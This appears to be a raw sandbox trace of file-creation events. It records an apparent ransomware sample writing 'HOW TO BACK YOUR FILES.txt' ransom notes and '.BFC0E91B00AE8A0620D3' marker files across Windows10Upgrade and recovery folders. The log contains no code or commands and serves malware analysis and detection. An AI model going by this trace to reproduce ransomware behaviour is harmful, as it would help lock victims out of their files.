Create C:\Windows10Upgrade\Windows10UpgraderApp.exe desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create Z:\Recovery\WindowsRE\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Windows10Upgrade\WinREBootApp32.exe desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\WinREBootApp64.exe desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Windows10Upgrade\resources\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\hwcompatShared.txt desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\i386\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Windows10Upgrade\resources\ux\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\block.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\bluelogo.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\bullet.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\default.css desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\default.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\default_eos.css desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\default_eos.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\default_oobe.css desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\default_oobe.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\eula.css desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\GetStarted.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\GetStartedHoverOver.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\loading.gif desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\lock.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\logo.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\marketing.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\NetworkIssueFAQ.mht desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\NoNetworkConnection.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\NoNetworkConnectionHoverOver.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\pass.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\base.js desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\dll1\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Windows10Upgrade\dll1\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\dll1\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\ui.js desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\i386\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Windows10Upgrade\resources\i386\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\i386\BiosBlocks.xml desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\i386\hwcompat.txt desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\i386\hwexclude.txt desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\i386\nxquery.cat desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\i386\nxquery.inf desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\i386\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\oobe-desktop.css desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\ui-dark.css desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_ar-sa.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_bg-bg.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_cs-cz.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_da-dk.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_de-de.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_el-gr.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_en-gb.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_en-us.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_es-es.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_es-mx.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_et-ee.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_fi-fi.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_fr-ca.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_fr-fr.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_he-il.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_hr-hr.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_hu-hu.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_it-it.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_ja-jp.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_ko-kr.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_lt-lt.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_lv-lv.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_nb-no.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_nl-nl.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_pl-pl.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_pt-br.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_pt-pt.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_ro-ro.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_ru-ru.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_sk-sk.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_sl-si.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_sr-latn-cs.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_sv-se.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_th-th.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_tr-tr.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_uk-ua.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-cn.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-hk.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
